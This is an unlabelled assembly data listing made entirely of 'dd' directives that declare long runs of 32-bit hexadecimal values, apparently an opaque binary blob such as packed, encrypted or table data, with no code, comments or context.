dd 4501C6D6h, 0A5E05978h, 3514447Dh, 0AD24ACBAh, 0D6AA309Ah
dd 41500481h, 8A06DE00h, 1779DF87h, 8EF73A81h, 0EB2E39FBh
dd 0CDA1702Ah, 2A4A8F2h, 0ED5C6C30h, 520A1916h, 0CACFFF3h
dd 0D442301h, 75384F5Bh, 0E53AECD9h, 767E79BDh, 4FF62038h
dd 0E96CAA6Ch, 40B51ACDh, 2383AE6Dh, 738C4728h, 9CE29EC1h
dd 7DC04E31h, 565816AEh, 0ADE628C7h, 42A41FB9h, 9931119h
dd 0B90B56F0h, 0B43E966Ah, 0E22CCB16h, 0DD10E7BEh, 0E54BFFDAh
dd 9B6F0627h, 0FE3D18E1h, 0CD8425B9h, 87D99DA5h, 231C3C24h
dd 94555F58h, 0C02F11C4h, 0D511AB33h, 382D82CBh, 5D612CBh
dd 3C4D6760h, 45B20F0Ah, 94FC93Bh, 0ED1FBDDBh, 69A6E8E8h
dd 0C6658553h, 4250A88Bh, 2FAFADDh, 0ED76576h, 8FC90BAEh
dd 47702EF6h, 0AA85EFB2h, 0B534AC23h, 596FFE10h, 0E820379Fh
dd 0BB3D4D76h, 0ED3F072Bh, 30BBB106h, 2250F60Ch, 1014DEDh
dd 80683738h, 5AB9C253h, 626BEE10h, 52B2AEA2h, 0F26D4176h
dd 2FF257ABh, 79D851CCh, 0FF01FAC7h, 0BEACC3B5h, 0A1E3934h
dd 974F7B57h, 1E99274Bh, 72AB64EBh, 0DB0FFDF0h, 0AF534BD4h
dd 0E24CAA71h, 0BF01EA3h, 0C97CC9A9h, 0C5B25030h, 470A40E0h
dd 0DF0887B0h, 9B50C451h, 674E5818h, 0C3FDFF67h, 0AF2709BCh
dd 105F3D9h, 0AED8ECBh, 5AC98459h, 57864208h, 0A2A23B39h
dd 94348F3Ah, 6741D676h, 0D6BBACABh, 7425A0C2h, 0A5DF997Fh
dd 3E7E6E5Eh, 0D39E1F78h, 9C2189FBh, 0BB0810CEh, 804D49E2h
dd 754DAF20h, 7039F34Fh, 6B8596D2h, 0CAD512E5h, 0B54792F8h
dd 0F697FB64h, 0CE3417CBh, 0AE50C878h, 0AF2FFE3Fh, 25E5F3E9h
dd 642B2BFBh, 7BD6B871h
dd 72BAD6Ch, 0F8F794BEh, 2E1FF1A5h, 0AEE50F3Ah, 0DD4E2430h
dd 2F95E102h, 0AB1DD8ACh, 0A9E543B2h, 0B8FB02D6h, 5218610h
dd 0AB6ECB07h, 4A96C99Ah, 0BFB934D0h, 74A0C7B5h, 0C625E27Dh
dd 679C81Ah, 74F1358Dh, 0E5E05A9Fh, 22E2AAFAh, 0B7533E23h
dd 0A10A45C6h, 7973D18Bh, 0A79DF81Bh, 49311753h, 3E4C5160h
dd 0B0100ED5h, 9912C8FBh, 60853643h, 0F1EE6316h, 68596E96h
dd 0A86060DEh, 63032522h, 7B23432Eh, 0F1050452h, 0D515A695h
dd 95152CABh, 0E4E9E7BCh, 65995C65h, 6101B0CDh, 8DFA6657h
dd 819B5A5Ch, 2DC7C0C5h, 1CD19DACh, 4C0F7941h, 5883CB9Dh
dd 0F9353C38h, 9A31445Fh, 0D5D08DAFh, 0EEE9476Dh, 0CE0E9628h
dd 0E91D9A14h, 0D6E47740h, 1083027Dh, 0C5FC8C76h, 0F14664D4h
dd 70311B9Bh, 0E409C53Eh, 9E9CFE5Fh, 0D352F59h, 28CDC141h
dd 0A6F3B214h, 0CA136720h, 55E72145h, 6FB852B6h, 0CC0BCC44h
dd 0B246EF28h, 7806F254h, 0EB3B296h, 32CAB406h, 86638B6Dh
dd 36547015h, 0AA661CA9h, 0BFEA507Ch, 0E0FA58B9h, 286B618Ch
dd 20E89CA0h, 571FE761h, 0A9023CABh, 0FB27D9F2h, 0F00EC276h
dd 8F50022Dh, 6CBD5FC1h, 6F381041h, 134552CDh, 367EA452h
dd 0D6BF2DF2h, 594588D2h, 88AFA045h, 0FBC8415Ch, 806BF595h
dd 1AD457D2h, 0DA336AF5h, 0DA70A320h, 0E88C8C3Ch, 0F7C50199h
dd 103C97ADh, 8D7055E6h, 0B829CEFAh, 0BED22CAFh, 264223CEh
dd 91E292E4h, 26E658F4h, 0D26EFC5Fh, 8C14EC5Ah, 6F44719Dh
dd 505B0F2Dh, 0F059B551h, 0DB8F280Dh, 838CD2D7h, 0E6979EF9h
dd 902D4BBEh, 92BAACC6h, 915195A8h, 10A09358h, 8185388Eh
dd 4DAB7063h, 0B736D7F6h, 35A8FA90h, 7C5421F0h, 41375B6Fh
dd 82A5F573h, 2EE43F70h, 172EA295h, 0E40CA4D1h, 9C12B501h
dd 9D1DD435h, 1F734F12h, 1808C915h, 4C3B9333h, 1B3B52A6h
dd 50405EF8h, 0D3AFEC57h, 0C6DA5E77h, 0C0423039h, 0A2FF13A4h
dd 0D7290EFAh, 8BC1AD3Ah, 0B055AA6Fh, 209FAC04h, 3A648B3Fh
dd 0A383C839h, 0E2F1884h, 1B9E277Eh, 0C51A4E3Eh, 4BBCFB7h
dd 559422B5h, 41732EFEh, 8A388E21h, 57DB2CA8h, 124EB699h
dd 98CDD132h, 239F69DEh, 38F4F930h, 91DAF02Bh, 566B19E3h
dd 0F6468366h, 0E7B52402h, 0E2227C77h, 559D0FF0h, 77C2E2C2h
dd 24708BBEh, 0C532B62Ah, 19DC9920h, 0FF68DB16h, 540181B3h
dd 0CC523ED0h, 5A8B9C18h, 1F2D2A62h, 0E402B259h, 6D31A79Ch
dd 0A7B39C22h, 0B63DAE23h, 202E51D4h, 551E4546h, 861B4430h
dd 54D39D33h, 0F0C2C70Ch, 0B827D77Eh, 6A306909h, 7E4C027Dh
dd 49D50C93h, 4C8301DAh, 0CEAA0278h, 0DDD2FD65h, 0BA14029Dh
dd 0CB009047h, 81616218h, 100E7B84h, 7B305573h, 0B8449D5Fh
dd 0E0E0A23Ah, 30B5A51Eh, 0ED7A5E93h, 26DA0DBFh, 7CE29200h
dd 7A6EBA6Dh, 0D76F8AB5h, 0FBFD1D98h, 0EBCA1249h, 9E51E2DFh
dd 0A278776Ch, 1B54888Fh, 0BE88B504h, 0E195403Bh, 318D4C39h
dd 0E8CE3513h, 649E2012h, 0E4529C29h, 597FD639h, 8BEEDF10h
dd 3405DC06h, 375DAE7h, 7674A9F1h, 229A2F81h, 8FB1C16Fh
dd 2ADD47A9h, 0E1061D67h, 0D6CD46F0h, 0E580B5ACh, 9D3442AFh
dd 7A094E37h, 0A2ECC23Bh, 53C65638h, 18A5AF15h, 0CCDDA894h
dd 3530D30Eh, 52B489D7h, 0D9D8B49Ah, 665508DFh, 1DEA9499h
dd 85D69C98h, 6D52C876h, 8DADB94Fh, 0DCDD94B7h, 9E1D676Ah
dd 662A02C6h, 4152F69h, 327E1C83h, 0A59EFD4Dh, 4C9BB618h
dd 0FEF33591h, 0A025FF38h, 0E81DD226h, 15B7C8CFh, 8C71FBBh
dd 79493D65h, 0CE044ED0h, 65EE8A2Ah, 0D492A7B7h, 8324A304h
dd 0FE9DE6B6h, 4ED1A75Ch, 6FD84402h, 244FC3F5h, 52292B09h
dd 0DFBA6A05h, 75960B16h, 68D8BFCAh, 4408EF66h, 41457E67h
dd 99FA0E09h, 2328AE21h, 0BA691236h, 3C24DBBDh, 0C6207D19h
dd 0D8EC7E6Ah, 5DE413B8h, 7DB82AF2h, 74E655A1h, 41F14568h
dd 4E997D0Ah, 855DE23h, 377D9136h, 0C09F2CF2h, 1A38B755h
dd 0BFF3744Eh, 0BFBC5E3Fh, 0B783ABB7h, 0A00ABD73h, 199B8028h
dd 8F813CD9h, 16109D6Fh, 3EAFCC02h, 0A850558Ah, 542A89E5h
dd 7204D2EBh, 0CFB5D2EFh, 0D8865074h, 9CFB1678h, 9B44BC07h
dd 0C5AC3DA2h, 199E0E5Dh, 61040524h, 5CD8604Dh, 7EEE6824h
dd 22571D33h, 1A469E01h, 2A66B8CFh, 18971A32h, 28E49B7Fh
dd 5DF5BD2h, 7AD72283h, 0BA385D15h, 0C0BA5E78h, 44275081h
dd 178F9607h, 439E7CBDh, 3DF03C05h, 0A7C06B00h, 7DFE314Dh
dd 5ACA0F5Eh, 0A8A914ABh, 324B967Fh, 0BF46807Fh, 9FFB5CEFh
dd 9715BCEEh, 8B042DDDh, 0A3ABE0Fh, 79DA11E2h, 0DAC26B1Eh
dd 9E400EFAh, 38FBCCF5h, 3B4B181Dh, 0B91A248Ah, 6549E0A7h
dd 0EC846884h, 0A3B7DCCBh, 0ADC75DB3h, 14863013h, 7105923Eh
dd 15A7168Fh, 4419592Bh, 0FE3860F4h, 4AA22FDh, 5AA76D0Bh
dd 0D34C8B7Bh, 394B5CFEh, 0A09BC09Ch, 9C8FB0Eh, 3BEC51A4h
dd 95F09029h, 4AC22978h, 0CFC6851Ch, 67CCBE6h, 8A12AC62h
dd 0B831984Dh, 18F8A74Bh, 4ADA56E3h, 63FA2429h, 3052C4BBh
dd 0F88D01BEh, 0D2208CAAh, 6FDD05BDh, 1C2361A5h, 0CBEFD560h
dd 0FA000F9Ah, 0E327DD3Fh, 0C82534D3h, 0C1F6BF11h, 0DB2ECF4Ah
dd 543F4383h, 5DC2EF3Bh, 4A1C2930h, 9A421439h, 0C3D5FC4Fh
dd 535F482Ah, 0CFC59924h, 1A9171E5h, 0B1558BDDh, 372EC19Bh
dd 0D95B9FB7h, 0CC3A164Ch, 0DA3133Bh, 0B798C48Eh, 9EA84055h
dd 0EF75EB5Ah, 80BC0371h, 0FC73998Dh, 21D46BE8h, 3918805h
dd 99B2DEFCh, 7187A389h, 0DE82648h, 65D5FB90h, 9706A9E8h
dd 23D2753Eh, 9F16B5B1h, 0D0FDCE66h, 525B3B6h, 0BCBA56B3h
dd 0F60DAB8Ah, 0E499EC3Bh, 16882C5Bh, 97B938B6h, 64C23ECBh
dd 0AEEA3654h, 61528C91h, 11CB2072h, 6C0190CDh, 19A1F787h
dd 50B9F0F4h, 0BFA86368h, 86CEB87Ch, 0CD32A712h, 365D7BB8h
dd 758204A6h, 4B72CD40h, 6C8D2A24h, 340B7F65h, 422D9819h
dd 41FB602Fh, 43E98A52h, 0A123E05Ch, 0D7938FE7h, 0BBB47B44h
dd 5D1F2281h, 43A9416Eh, 0A1C889B4h, 8D3515F4h, 0B224B91h
dd 0A99C32F6h, 31B0E10h, 9DFC61B1h, 0CC898D33h, 5E7CA297h
dd 7487E83h, 0EBFE32CBh, 66A0F857h, 0A6BA7B21h, 786381ABh
dd 3B096CC1h, 12B88FC9h, 0F73CB3CCh, 90E30098h, 0C9A223B2h
dd 6D5766CBh, 0D3172515h, 48EF4892h, 0F4B7C1B3h, 0D0C0CDA9h
dd 0FF3F8631h, 21A3BD23h, 68D297DDh, 0D5E6A02Ah, 944172D2h
dd 0E9EA7D2Eh, 0B65A4700h, 0A4147A52h, 5E52C66Eh, 0B1ED07B9h
dd 0E26E531Bh, 0C3744BFBh, 6756B346h, 0B71D455Fh, 0F5B34E8h
dd 0E4F82149h, 0DE4E5603h, 49683541h, 98F4FA63h, 0FB7E550Eh
dd 0A325426Dh, 0CA265FCFh, 0B2A29539h, 8042AEC0h, 1C6FE1DFh
dd 8AA1D0BDh, 1B784804h, 7BFD3C9Bh, 0D0647334h, 3D832E0Dh
dd 88F63733h, 63D61731h, 0CD82D186h, 6E6DBFD2h, 6C1DD908h
dd 447FB9C8h, 384E99EDh, 0DAEF9766h, 7178C962h, 8E548D8Dh
dd 5B5BF4DCh, 49CF1566h, 3B1639F9h, 0CDDADD23h, 2FD7BA8Ah
dd 2B8F5ABBh, 0F7DE86ECh, 295B8799h, 0A92CCCA8h, 6A56BF5Fh
dd 494252E4h, 9A6534F0h, 999AC53Fh, 2A57EA26h, 0AEB59CE2h
dd 0BFF0ABA6h, 86E4CCCh, 45542A6Eh, 441E732Eh, 8886ECFFh
dd 25508BB7h, 0B385DFACh, 38646E8Bh, 912D15E9h, 5946DE1Ch
dd 0C4789EC1h, 0D98AB780h, 8ACA9747h, 0B8604406h, 9F0B733h
dd 61D770EAh, 0EA6C5E23h
dd 178812EFh, 0DA4F70C5h, 87473E29h, 2F94B5DDh, 0FD9B7426h
dd 77A16A3Ah, 72911B49h, 351CCF21h, 51635FEFh, 47EB97CBh
dd 1FE2BA40h, 0B80AC07Eh, 0C73ED396h, 0C190DCD0h, 82E941ABh
dd 292C8DB7h, 0CD22FFD5h, 719F823Bh, 4867E3ACh, 63B9EAF1h
dd 92865C57h, 0D2C8F174h, 0CC3BA38Fh, 0BCEA4B6Bh, 98533B06h
dd 3DBA3600h, 0DE47619Bh, 0F3323A25h, 0DA967BBCh, 5EBE3343h
dd 0A0F60223h, 490BA47Bh, 1E0CEC64h, 158CDFCFh, 0AD1B2584h
dd 89D179E3h, 1FF18B20h, 0A034D242h, 0F7777BACh, 0A7ABA293h
dd 9BB84804h, 0ECA1BA6Ch, 0DBD360B3h, 0DFF92B45h, 5C6CB586h
dd 0A797C7EFh, 531F73D9h, 0F81C6AB8h, 8225C5F5h, 0C3752ED0h
dd 0CEB3B398h, 0BD46FFA1h, 55C31551h, 612F7578h, 20A4A431h
dd 0FFA9D93h, 13052DB6h, 0C48571FDh, 9D625FA9h, 90511BE5h
dd 0BEDC3566h, 58992D46h, 0CDF61C80h, 92936962h, 3E4C4B77h
dd 0E8298E04h, 0D244375Ch, 1BD79DFAh, 0A33EBC5Ch, 0A7681878h
dd 9FFE79EEh, 2EF890B1h, 9E69433h, 90CE93A2h, 0D72D9B00h
dd 61F1D9DDh, 0DFC464B2h, 35EFB7A4h, 5BF75402h, 89BD7835h
dd 7E5947BFh, 7DA3084h, 0B914380h, 0F65A2147h, 0FC88475Dh
dd 3395DE83h, 5888D5EDh, 0DAA9EE5Ah, 4BFAD6B9h, 920C471Bh
dd 711D4D5Ah, 5A09A97Ah, 7F9F3502h, 96416E7h, 19B6D7AFh
dd 7980AB8Eh, 769E4476h, 0DEBEB8BBh, 230BB04Fh, 6684E60Ah
dd 4604C6B4h, 0A41DE9F8h, 0AD930259h, 0D26C3573h, 0C713E23Ah
dd 0D279AB26h, 30CE54CDh, 0A9895D81h, 91D97CE9h, 0CCCD4FE5h
dd 65E184F7h, 0C0AAB436h, 0B5248386h, 2E2584ABh, 296528CDh
dd 0B6833DD6h, 4DCACF00h, 1A0EA59Ch, 0C762EBE4h, 76C76640h
dd 0B0E49BBh, 8D77B7EAh, 943BBCAFh, 77C28410h, 0E70A5804h
dd 1FEFE7D3h, 5E5A5358h, 7A8CCA5Eh, 3D859338h, 943F835Ah
dd 27E835ADh, 1A8FEAE1h, 0CCA16444h, 3F62BE12h, 81C77BFh
dd 513CD1h, 84212508h, 0A06C4754h, 5A35C166h, 1128D33Dh
dd 0E1907A42h, 87074FC9h, 9BB61128h, 0E1264FD8h, 9B3CD0DAh
dd 0F10826EEh, 0BA1B544Dh, 7D001B0Ah, 0F6BC2D09h, 8AEB516Ah
dd 9D72DD78h, 0DEDA9191h, 7C4C035Ch, 9C48EFF6h, 38E50B45h
dd 481A47B1h, 73A29F52h, 0EC048B63h, 9FB85688h, 61E9B04Fh
dd 5F886415h, 207F37FDh, 7E34A65Bh, 8DBE77E1h, 14F280B3h
dd 4F658242h, 8D34A91Ah, 0DF8B8932h, 84C8C5EAh, 0D98CAC3Ch
dd 1A4ACE32h, 0B79581Bh, 0FE94A053h, 0F327684Dh, 4E094121h
dd 8A23EC3Dh, 7DF63BFh, 0C98C0D8Ch, 8C078CEEh, 3FBA4E0Fh
dd 0FB3E17Fh, 9A80505Fh, 8B96B2B4h, 0C2299B7Dh, 5315206Ch
dd 34F4728h, 0A2838C10h, 1817D5DAh, 3E8ABDC1h, 87922435h
dd 46A03494h, 84F0088Bh, 3FBFB33Ch, 5B314562h, 0B73EA347h
dd 49975FBCh, 87200132h, 0ACAE468Bh, 7DEAEFA3h, 3A9A75FDh
dd 32016A09h, 3FAB9AF2h, 47861AC3h, 889B7249h, 5DA2F16Bh
dd 0B4529B2h, 45E454A6h, 0E78A44B6h, 2876394Eh, 2425EE77h
dd 0D02257E6h, 0D397867Eh, 29040AB3h, 17331D20h, 0E5889309h
dd 0EBCD79BBh, 3E7A29DAh, 6587152h, 5A31F47Ah, 0C202FB9Fh
dd 7DB78916h, 4287C083h, 580ACBC4h, 0CCDDCCABh, 2B5E8E19h
dd 0F90CE402h, 2004CFFDh, 0DB2B9620h, 0E1C1A65Bh, 64103F25h
dd 0E0C38B19h, 58765846h, 3DACD750h, 26C7FDC4h, 707758C7h
dd 5F1E492Fh, 78DF29CBh, 5A29F448h, 8E6F9FDEh, 90B6748Ch
dd 8AE32946h, 0E0998F5Ch, 4C7915EEh, 83674DE5h, 532D2E82h
dd 2D9A926Ah, 22D0E285h, 3765F74Fh, 3C18C520h, 1BB63C9h
dd 0B88F041Ch, 63F652h, 18F6314Dh, 0EE9369C6h, 0F12C2C35h
dd 0AA791BDAh, 32CFDA58h, 742A0B84h, 612B92Ah, 2B9634B9h
dd 65DAE0FFh, 6E18F070h, 65C26048h, 0E2F30C2Eh, 7BC8A35Ah
dd 36E9F2ECh, 0C1F3F55Ah, 3F6343E8h, 0D3CA744Dh, 0E8B2208Dh
dd 5A28B4D8h, 48D65840h, 0DF633779h, 4EED71D2h, 0A05915E6h
dd 5A0EE9A0h, 0ECC306BEh, 0BED895E4h, 513E254Ch, 0BC852E44h
dd 0BDDDB23Dh, 0FECEB940h, 71FCB67Bh, 0F6C7C419h, 0B9B04B32h
dd 37ADA105h, 0A6979940h, 0F0D8504Eh, 4566FC72h, 0A5990C6Ah
dd 5D0F55E4h, 4635FFD6h, 0D31B96B4h, 0B8B886F9h, 9FE91ABDh
dd 208495C8h, 0C928D209h, 672717A6h, 0E836D602h, 2145A4EEh
dd 96A35BC9h, 83593BD0h, 0F2F4486Eh, 8940B7D9h, 0AB3FE739h
dd 803D926h, 0A3D55AE9h, 0BFBF5C40h, 0E4EF3E80h, 42CDAE76h
dd 0B550EA84h, 61A105D1h, 14D2A466h, 0A152A87Fh, 3D23A7C7h
dd 0F2FE1B81h, 0DB4991F5h, 0FBB5AF26h, 15695EC5h, 0D62229AFh
dd 33E653BEh, 14C8D288h, 7644D595h, 0BB048990h, 8F71C6E3h
dd 3649B6E0h, 99982971h, 7D6AD21Bh, 4F74C535h, 1FF02729h
dd 0D6F8C3A2h, 1035F98h, 1E9C7A31h, 0FA680080h, 5EA0E031h
dd 6FB8556Bh, 8956645Fh, 2FD7DB8Eh, 8F52BE08h, 81549FFCh
dd 7974AE99h, 94DB8286h, 72A8B3B5h, 0ED14E6C8h, 0E01FF01Eh
dd 1EFC5F7h, 131DEF8Dh, 436956ECh, 0C45D152Eh, 0B3152F87h
dd 14C0B962h, 1D8E30A0h, 68A03796h, 0A41D4929h, 80925499h
dd 9467D84Eh, 0E8C00EEh, 30C4086Eh, 0FCE287FFh, 6B676E9Eh
dd 0EB0CB417h, 0A43C17C4h, 0C08432C8h, 6A5B41E9h, 8158BA80h
dd 4CC69431h, 2DA5F365h, 7439699Ah, 617BC423h, 0A52AFD6Fh
dd 2C741E41h, 45C8FC6Ah, 371412BFh, 0E94740C3h, 0DFA0B453h
dd 0FA1F3AA1h, 9DB19484h, 2F95FFFEh, 0CDBDDED1h, 0F2890B22h
dd 0ADD3527h, 26505695h, 0FD36AD7Dh, 2108932Ah, 0A8F145EDh
dd 0C398FC2Ch, 7C6C9287h, 0DC23A50Bh, 7EE255B9h, 50E39472h
dd 602B3754h, 8199DB7Ch, 0A8D35F64h, 6B0F1A07h, 31BC5129h
dd 12A07949h, 0C49F0A4Fh, 76030807h, 536C0935h, 1536A0E1h
dd 942BA4C6h, 6E56F37Fh, 77E12074h, 0C95CE5EAh, 422D26F9h
dd 0F3227C1h, 6A17C6A3h, 24BB0413h, 0C2F61B5Ah, 880C2237h
dd 4E0B5F69h, 452F5948h, 64DD90AEh, 41FD55BBh, 386B289h
dd 0EDB3E91Fh, 3E09AB06h, 84FE8871h, 58837722h, 1560483Fh
dd 13BF02E6h, 75ACAC84h, 65A43510h, 1412BB8h, 0EF0D0F0Fh
dd 0EA90090Dh, 8EA38F94h, 7BC8FA3Ch, 2BA8A66Eh, 76063FF5h
dd 52083119h, 3A46809Eh, 9EB59F2h, 0C97D4C21h, 0E00A2EA6h
dd 39CEB890h, 147DEDCFh, 549A8EE7h, 93B73100h, 0B04C2515h
dd 0C44FF5C3h, 0CD8F4E94h, 76CCC0F5h, 837CA94Eh, 0D68667C3h
dd 84E8B424h, 0BF23477Eh, 67C48128h, 9C5DED76h, 305D0543h
dd 25A159D5h, 0A3E19C48h, 0B8DF6E4Fh, 144A4919h, 42B62A83h
dd 0EA540228h, 6F0C2F50h, 9D4D4954h, 0F1653F0Dh, 82B345B1h
dd 0EF23FC99h, 0FF0C9DA2h, 9A22C56h, 7DE43C0Ch, 1A7AFEFBh
dd 56E6B3E5h, 71C998FFh, 80D081CBh, 0A4B252F2h, 2F572DA6h
dd 52A94B6Bh, 10BF8A7Bh, 0DCB9FB85h, 977C24DEh, 0EC4ADC8h
dd 0AD367F2Dh, 0A174907Dh, 0C1092B82h, 3CB3B2D9h, 7DE939F6h
dd 0B435A2DDh, 62FC32Dh, 2C86912Eh, 4ACF331Ah, 0DA88D2C4h
dd 9642CE1Fh, 24BC788Ah, 0A48C9D73h, 74780F56h, 7A6D5AF3h
dd 0B04A3F50h, 0D88BA7A6h, 0F332D3C7h, 0D3F85C69h, 0E6E82D5Fh
dd 0A12ABD03h, 0C044E565h, 8BF2F95Dh, 315B5FA7h, 0D2BB7A1Ah
dd 0C30D7D30h, 0C29B8718h, 0F2D96E25h, 6D099A10h, 2B1AFB79h
dd 0E6444868h, 5659DB2Dh, 217FD20Bh, 3DA46EBDh, 0B2F6E9F0h
dd 0A0ABB208h, 7AAAF723h
dd 55C4BFD8h, 7D8D0D16h, 6FA5A16Dh, 3A19E38Eh, 0FF202F3h
dd 1D2E4A8Bh, 8FF28434h, 0A9F2BFE8h, 8430DA0Dh, 6D3F510Dh
dd 0CFB921E6h, 463B20B2h, 0D6FBEC15h, 3AB49225h, 0F04DD126h
dd 0AF1CBB94h, 0FF739189h, 0C5750D07h, 456F84CCh, 6BCC0208h
dd 8753CE26h, 9D0FDA00h, 0AE05DC73h, 7A638238h, 167986E3h
dd 0C171FE38h, 0EFAFA6D7h, 33E9BE58h, 0C4B457C5h, 0B93E6B5Eh
dd 6104C5D4h, 0B7517B8Eh, 0CFECD35Bh, 3581E3C5h, 9883ED44h
dd 0DA333D32h, 0DB64FA9h, 0A6A2D6DFh, 3153D12Bh, 8E4A0C6Eh
dd 9BDC30C9h, 1C2817E3h, 0C7A0ACD8h, 24740ABCh, 96C75A4Bh
dd 0C166A438h, 4D9129CBh, 7B26A33Bh, 4FD23FFFh, 0A36C7B25h
dd 4E536578h, 3CDE93A7h, 0BBCE2583h, 75318C3Eh, 0CBFDE1BBh
dd 0E9669C30h, 18CC78A9h, 0BCBACF4Ah, 6E9EDD67h, 91188B0Dh
dd 136E8A73h, 637269C9h, 0C48F4985h, 8348B0A9h, 0CE8E5630h
dd 4EA1CE05h, 5CA1EED3h, 352CF75Bh, 0DB8759B8h, 0AA088EC9h
dd 32E2537h, 0BE6FD699h, 84D71D15h, 0E607F678h, 236793CCh
dd 0B2EFD41Ch, 5BA3CDE3h, 8D09A43Ch, 241B4644h, 31F34CCBh
dd 0BDE9502Bh, 6F81E36Fh, 534D0C3h, 3135D454h, 0EDEE56C4h
dd 382A6126h, 0A424246Ch, 6EFA97F5h, 15F89104h, 0D79EC21Ch
dd 7BEF65E7h, 0E944593Dh, 65ADB903h, 16FDEB8Eh, 0CEBBB70Eh
dd 17704974h, 0C01755F9h, 0ABC4F43Dh, 94DB18D1h, 498EA030h
dd 9A54E048h, 4AB49A08h, 0D22A6ED5h, 0EABD647Dh, 3FFC2F06h
dd 0AD0928C7h, 17E43669h, 4E0A7AA6h, 762EDB37h, 9684A63Bh
dd 92A38164h, 0A795AFB4h, 73682735h, 2E805AD6h, 2D47EDEBh
dd 0F4C58927h, 6E19420Bh, 142AC11Fh, 528ECC7Dh, 872ED20Fh
dd 2CC618F5h, 48F3B40Ah, 25591401h, 158E9EA0h, 8ECF2E05h
dd 421EC9DBh, 1A116B21h, 0CAFD0D29h, 5758FAF2h, 5F235947h
dd 692C7361h, 9DA92F03h, 8FB4DDEBh, 6094CC05h, 6EC893FFh
dd 0CE5D8C18h, 6A18A0A0h, 6941684Bh, 0CD98CCBCh, 0CEA1B02Ch
dd 0E1C59C03h, 837FE080h, 0EBA0AEAEh, 9D85B4BAh, 0CCDB38CCh
dd 4457FC9Fh, 0B0332E91h, 8D26DC4h, 20B4E6BEh, 0E9064368h
dd 4DB6DE0h, 71334E8Dh, 86DECC3Dh, 0E0BD13C7h, 59CE1A11h
dd 591DD31Ah, 90FF5FD4h, 28DC203Bh, 0D1C36FC5h, 0AC1476AEh
dd 482035E0h, 0DAB718E1h, 1B9F7E38h, 0B81A9C16h, 0FAE1BADBh
dd 0C55C67FDh, 312A596Dh, 0FA0B2D6Bh, 576CD127h, 0EF6DF6F6h
dd 21C3465Ah, 7434D9A1h, 52C82E31h, 1FEF48F5h, 38EC1AF2h
dd 7CBDB9A4h, 161715C9h, 1B8A53CDh, 7B69ECC5h, 1CD3CCEEh
dd 5C79F63Dh, 0C811ECDAh, 0F20A4426h, 7310B5C8h, 0ACD92C83h
dd 0C7E9F12Ah, 4B1B180h, 0DBE43981h, 0E7CFEDDAh, 0D8B35159h
dd 0FBB3EF25h, 7BE98371h, 0B71DCAE6h, 7AA72F02h, 0E4186586h
dd 0FE8D3EEAh, 27FEDE99h, 406924EEh, 0EEB947Dh, 0D83C268Ah
dd 97285188h, 0A32A50E4h, 4411A966h, 0A4F06088h, 9FD0B58Dh
dd 0B04F3320h, 0F543B0F3h, 6AC198AEh, 0B43A9748h, 0B9BCEC31h
dd 33E35593h, 77707F93h, 0D282FE3Bh, 0C39603FDh, 5A83A6C8h
dd 0CA73DC88h, 0D837FD6Bh, 0E7124369h, 54D291EBh, 0FD9F8575h
dd 0D0214776h, 38A49CDEh, 7ED984F3h, 377200F5h, 6EC17D08h
dd 766760C5h, 0BE4F4D6Ch, 889812C4h, 240C0E60h, 426A6E6Fh
dd 8D2E89D9h, 0E653F91Ah, 8EEC9E6h, 40D8A91Bh, 256B9CC3h
dd 18CDAC7Eh, 0CD12D375h, 0EB5B1A6Ah, 99389239h, 63D3899Ah
dd 0B5FFD45Fh, 0B364E314h, 0D1E7750Dh, 8EFFEA9Eh, 30FCB6B9h
dd 0C6461EAAh, 2E8B1D53h, 9E37E56Ch, 0B7A2454Bh, 567192D6h
dd 0E1E689F6h, 0BC16EB59h, 6E40C0C6h, 0DB56137Dh, 2A08D83Bh
dd 51C073CCh, 2D55681Dh, 0FFCE99B2h, 253D419h, 885B175Dh
dd 0A7294041h, 6F79900Fh, 0CC87C334h, 2C0EB40Ah, 50484E6h
dd 8EEAC609h, 34577BABh, 0DDBA706h, 0FA006EB1h, 15000A35h
dd 0FEDA2C2h, 0D4A2FF9h, 0C280A259h, 0A88E1AFCh, 6AAC14B9h
dd 69DDD0F5h, 9ADE5302h, 0A67AC3E2h, 8822158Ah, 82DB8A30h
dd 23E98A1Ah, 936E4D9Ah, 5DA9BE6Ch, 88BCC6E3h, 0D229720Fh
dd 3A78520h, 43AC8BCFh, 5B08332Bh, 0D7EFB5A5h, 65337190h
dd 2CF57628h, 8F77F4B4h, 0D7E3495Dh, 2E860660h, 0F020468Ch
dd 0DD195DE7h, 4E5DC6F8h, 28DBF044h, 6546EA47h, 431FFD10h
dd 91116055h, 0C4A4FC5Ch, 8D9F077Ah, 304354A5h, 0C933A4C8h
dd 4BB96184h, 0D2B1113Fh, 8A185195h, 5D7CE893h, 22F8E1D6h
dd 0D996D5F0h, 56CFD63Eh, 0DAB2362Ah, 76D89CB3h, 51E79F9Ah
dd 313E6F0Ah, 36E2AA0Eh, 347055E5h, 6A59FA19h, 976A016Dh
dd 0F92600B0h, 63EE9C5Fh, 12D48954h, 0A48F4772h, 11D5BF9Dh
dd 55C017D0h, 0D66AE770h, 386D3B91h, 0C3E5CE6h, 7A9C7095h
dd 0E450AC6Bh, 0E6DD1D33h, 9667F52Eh, 49E41AF4h, 0ED0EBC47h
dd 62F492BFh, 10FCA45Ch, 993CEAB5h, 5B569882h, 23D4507Dh
dd 1E97C8A7h, 6F4C98B3h, 22E651Ch, 4E676312h, 9C11B3DFh
dd 915F9B1Bh, 4F9243D5h, 0EFD4969h, 0EFFDEA03h, 0E6FBD131h
dd 544C789h, 0D3E857ADh, 9B4B973h, 0BF3450E9h, 37F90601h
dd 0D5DB012Ch, 0C4094BB1h, 17C63E87h, 38BE7A69h, 4D948BADh
dd 3E49FCFAh, 6A58D3D4h, 52D1FD37h, 0C18EFDD9h, 0A62B809h
dd 0E05CB568h, 30752530h, 0A56F502Dh, 83E0E93Ah, 0F216CBBBh
dd 0D7D2C574h, 0C99F9889h, 0B650E2F2h, 0BB7E4F97h, 0ADA211ACh
dd 10C3C2AAh, 0AE70AC7Fh, 8F297227h, 0A3F1852h, 2E83F27h
dd 0ECD0766Dh, 0C1801BD8h, 888DF106h, 78E8F14Bh, 0CE175852h
dd 0BD88A382h, 5DACA308h, 669A6F86h, 5A2B85CEh, 3CD72817h
dd 36AC9D98h, 712E114Ah, 7FB721BEh, 3BD34F5Eh, 98BDA9C6h
dd 4D219F30h, 213A602Eh, 0A65B3537h, 0C306B632h, 846006BFh
dd 0EDC423F2h, 8DAE5E12h, 0AC737DF5h, 0D8BC4EAEh, 0C56E2EAh
dd 0AE4B4AD5h, 1906353Ch, 0C26BAA6Ah, 15C55C4Dh, 6ACD805Dh
